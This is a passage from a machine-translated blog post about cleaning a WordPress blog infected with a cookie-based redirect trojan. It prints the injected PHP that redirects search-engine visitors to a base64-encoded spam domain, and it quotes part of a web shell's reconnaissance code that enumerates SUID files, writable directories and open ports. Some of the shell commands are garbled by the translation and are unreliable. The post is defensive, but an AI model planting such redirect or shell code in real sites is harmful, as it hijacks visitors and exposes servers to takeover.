Вирус блогосферы… а что у вас было со мной ?!

В прошлом месяце я получил предупреждение Вирус в блоге от некоторых посетителей. Сначала я проигнорировал предупреждения, потому что я установил довольно хороший антивирус (Kaspersky AV 2009) И даже блога в течение длительного времени, я никогда не получал вирус оповещения (давно .. я видел что-то подозревают, что первое обновление исчезли. Наконец ...).
Медленно начал показывать большие изменения посещаемостиПосле чего в последнее время неуклонно уменьшается трафик и начал все больше и больше людей говорят мне, что stealthsettings.com это virused. Вчера я получил от кого-то скриншот делается, когда их антивирусные скрипт от stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Это было довольно убедительно для меня, так что я положил все источники поиска. Первая мысль, которая пришла мне в голову было сделать модернизация последняя WordPress (2.5.1), но не раньше удаления всех файлов в старом скрипте WordPress и сделать резервное копирование базы данных. Эта процедура не сработала, и, вероятно, мне потребовалось бы много времени, чтобы выяснить, где находится ошибка, если бы она не сказала мне. Eugen В дискуссии за чашкой кофе, он обнаружил, ссылка Google и было бы хорошо, чтобы увидеть его.
MyDigitalLife.info опубликовал статью под названием: «WordPress Взлом: восстановление и исправление Google и поисковой системы или трафика без файлов cookie, перенаправленного на Your-Needs.info, AnyResults.Net, Golden-Info.net и другие нелегальные сайты"Это конец нити мне было нужно.
Речь идет о эксплуатировать de WordPress на основе файлов cookieКакой я думаю, что это очень сложная и сделали книгу. Умные достаточно, чтобы сделать SQL-инъекция База данных блога, Для создания невидимых пользователю Простая проверка рутинной Аккаунт->Пользователи, проверить сервер каталогов и файлов "записываемый" (что chmod 777), искать и выполнять Файлы с привилегиями группы или корня. Я не знаю, кто эксплуатирует имя и видим, что есть несколько статей, написанных о нем, несмотря на то, что многие блоги инфицированных, в том числе Румынии. Хорошо ... Я постараюсь, чтобы попытаться объяснить общими о вирусе.

Что такое вирус?

Во-первых, вставить источников страницах блогов, ссылки невидимыми для посетителей, но видимых и индексируемая поисковыми системами, особенно Google. Таким образом Передача Page Rank сайтов указанные злоумышленником. Во-вторых, вставлен другой Перенаправление код URL для посетителей из Google, Live, Yahoo, ... или RSS читателя, а не сайт в печенье, антивирус определяет, как перенаправить Trojan-Clicker.HTML.

Симптомы:

Снижение массовые движения посетителяОсобенно в блогах, где большинство посетителей приходят из Google.

Идентификация: (здесь проблема усложняется для тех, кто мало знает о phpmyadmin, php и linux)

Лос-Анджелес. ВНИМАНИЕ! Сначала сделайте резервную копию базы данных!

1. Проверьте исходные файлы index.php, header.php, footer.php, Темой блога и посмотреть, если есть код, который использует шифрование base64 или содержит «if ($ ser ==» 1? && sizeof ($ _ COOKIE) == 0) »в форме:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

Или ... что-то. Удалить этот код!

Кликните на картинку ...

Кодовый индекс

На скриншоте выше я случайно выбрал и " ". Этот код должен остаться.

2. Использовать PHPMYADMIN и перейдите к таблице базы данных wp_usersГде проверить, если нет имени пользователя создается на 00:00:00 0000-00-00 (Возможно в полевых user_login написать "WordPress». Запишите идентификатор этого пользователя (поле ID), а затем удалите его.

Кликните на картинку ...

псевдопользователь

* Зеленая линия должна быть удалена и сохранил свой ID. В случае сонныйБыл ID = 8 .

3. Перейти к таблице wp_usermeta, Где вы расположенный и вытирать Линии для ID (где поле user_id ID значение удаляется).

4. В Таблице wp_option, К active_plugins и посмотреть, что плагин включен подозреваемого. Он может быть использован как окончаний _old.giff, _old.pngg, _old.jpeg, _new.php.giffи т. д. сочетания расширений фиктивных изображений с _old и _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Удалите этот плагин, затем перейдите в блог -> Панель управления -> Плагины, где вы деактивируете и активируете любой плагин.

Нажмите на картинку, чтобы он появляется active_plugins вирусом файл.

плагин

Следуйте по пути на FTP или SSH, указанные в active_plugins и удалить файл с сервера.

5. Кроме того, в PHPMyAdmin, в таблице wp_option, Найти и удалить строку, содержащую "rss_f541b3abd05e7962fcab37737f40fad8"И"internal_links_cache ".
В internal_links_cache, предложил зашифрованные ссылки спама, которые появляются в блог код Google Adsзагривок, Хакер.

6. Рекомендуется изменить пароль Блог и Войти удалить все подозрительные userele. Обновите до последней версии WordPress и настройте блог так, чтобы он больше не позволял регистрировать новых пользователей. Потерь нет… можно и комментарий необитаемый.

Выше я попытался немного объяснить, что делать в такой ситуации, чтобы очистить блог от этого вируса. Проблема намного серьезнее, чем кажется, и почти не решена, потому что они используются уязвимостей хостинг веб-сервер, который является блог.

В качестве первой меры безопасности, имеющие доступ SSH, Сделать некоторые проверки на сервере, чтобы видеть, есть ли файлы, такие как * _old * и * _new. * С окончаний.Гифф,. JPEG,. pngg,. jpgg. Эти файлы должны быть удалены. Если вы переименовать файл, например. top_right_old.giff in top_right_old.phpМы видим, что файл является именно сервер вредоносный код.

Несколько полезных инструкций по проверке, очистке и защите сервера. (через SSH)

1.  CD / TMP и проверить, если есть папки, как tmpVFlma или другие комбинации asemenatoare имя и удалите его. Смотрите скриншот ниже, две такие папки на меня:

tmpserver

РМ-РФ имя_папки

2. Проверить и устранить (изменить chmod-ul) по возможности папки с атрибутами chmod 777

найти все доступные для записи файлы в текущем каталоге: Найти. -Type F-Пермь-2-LS
найти все записи каталоги в текущей директории: Найти. -Type D-Пермь-2-LS
найти все доступные для записи каталоги и файлы в текущем каталоге: Найти. -Пермь-2-LS

3. Ищете подозрительных файлов на сервер.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, ВНИМАНИЕ! файлы, которые были установлены бит SUID si SGID. Эти файлы выполняются с привилегиями пользователя (группу) или корень, а не пользователей, которые запускают файл. Эти файлы могут привести к корневой компромисс, если вопросы безопасности. Если вы не используете SUID и SGID файлы с битом, выполнить 'chmod 0 " их или удалить пакет, содержащий их.

Эксплойт содержится где-то в источнике ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Находит так ... в основном нарушения безопасности. Порты открыть каталог "записи" и группа исполнения привилегии файлов / корень.

Вернуться с подробнее ...

Некоторые блоги инфицированных: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
мотоциклы.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/блог, blog.einvest.ro
... Этот список можно продолжать ... много.

Проверить, не заражен ли блог, можно с помощью поисковой системы Google. копировать вставить:

Сайт: www.blegoo.com купить

Спокойной ночи и хорошей работы;) Думаю, скоро Евгений придет с новостями на prevezibil.imprevizibil.com.

BRB :)

ВНИМАНИЕ! Изменение темы WordPress или перейти на WordPress 2.5.1, НЕ является решением для избавления от этого вируса.

Поклонник технологий, с 2006 года с удовольствием пишу на StealthSettings.com. Обширный опыт работы с операционными системами: macOS, Windows и Linux, а также с языками программирования и платформами для блогов (WordPress) и онлайн-магазинов (WooCommerce, Magento, PrestaShop).

КАК » Обращает на себя внимание » Вирус блогосферы… а что у вас было со мной ?!
Оставьте комментарий